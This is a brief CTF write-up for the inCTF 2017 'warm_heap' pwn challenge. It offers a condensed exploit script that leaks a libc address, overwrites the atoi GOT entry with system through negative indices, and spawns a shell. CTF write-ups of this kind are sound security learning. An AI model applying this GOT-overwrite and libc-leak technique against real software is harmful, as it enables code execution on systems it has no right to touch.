Tags: pwn 


No need to use UAF, since you can directly overwrite `got` entries with negative indices

See https://kileak.github.io/ctf/2017/inCTF-warm_heap/ for full exploit and explanation.

Short version:

add(0, 0x602020, "AAAA") # for libc leak
add(2, 0x602068, "AAAA") # for atoi overwrite

LIBCLEAK = u64(view(-12).ljust(8, "\x00"))
libc.address = LIBCLEAK - libc.symbols["puts"]

log.info("LIBC leak : %s" % hex(LIBCLEAK))
log.info("LIBC : %s" % hex(libc.address))

log.info("Overwrite atoi got with system")
edit(-10, p64(libc.symbols["system"])[:6])

log.info("Select /bin/sh to trigger shell")


Original writeup (https://kileak.github.io/ctf/2017/inCTF-warm_heap/).